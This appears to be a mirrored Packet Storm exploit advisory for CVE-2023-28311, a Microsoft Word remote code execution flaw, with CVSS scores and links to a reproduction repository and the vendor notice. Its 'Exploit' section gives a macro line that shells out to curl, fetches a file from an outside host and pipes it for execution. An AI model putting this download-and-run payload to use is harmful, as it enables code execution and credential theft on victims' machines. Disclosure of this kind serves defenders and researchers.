Lucene search

K
packetstormNu11secur1tyPACKETSTORM:171882
HistoryApr 14, 2023 - 12:00 a.m.

Microsoft Word Remote Code Execution

2023-04-1400:00:00
nu11secur1ty
packetstormsecurity.com
286

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

`## Title: Microsoft Word Remote Code Execution Vulnerability  
## Author: nu11secur1ty  
## Date: 04.14.2023  
## Vendor: https://www.microsoft.com/  
## Software:  
https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3  
## Reference:  
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/  
## CVE-2023-28311  
  
## Description:  
The attack itself is carried out locally by a user with authentication to  
the targeted system. An attacker could exploit the vulnerability by  
convincing a victim, through social engineering, to download and open a  
specially crafted file from a website which could lead to a local attack on  
the victim's computer. The attacker can trick the victim to open a  
malicious web page by using a `Word` malicious file and he can steal  
credentials, bank accounts information, sniffing and tracking all the  
traffic of the victim without stopping - it depends on the scenario and etc.  
  
STATUS: HIGH Vulnerability  
  
[+]Exploit:  
The exploit server must be BROADCASTING at the moment when the victim hit  
the button of the exploit!  
  
```vbs  
Call Shell("cmd.exe /S /c" & "curl -s  
http://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus)  
```  
  
## Reproduce:  
[href](  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28311)  
  
## Reference:  
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28311)  
  
[href](  
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/)  
  
## Proof and Exploit  
[href](https://streamable.com/s60x3k)  
  
## Time spend:  
01:00:00  
  
  
`

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H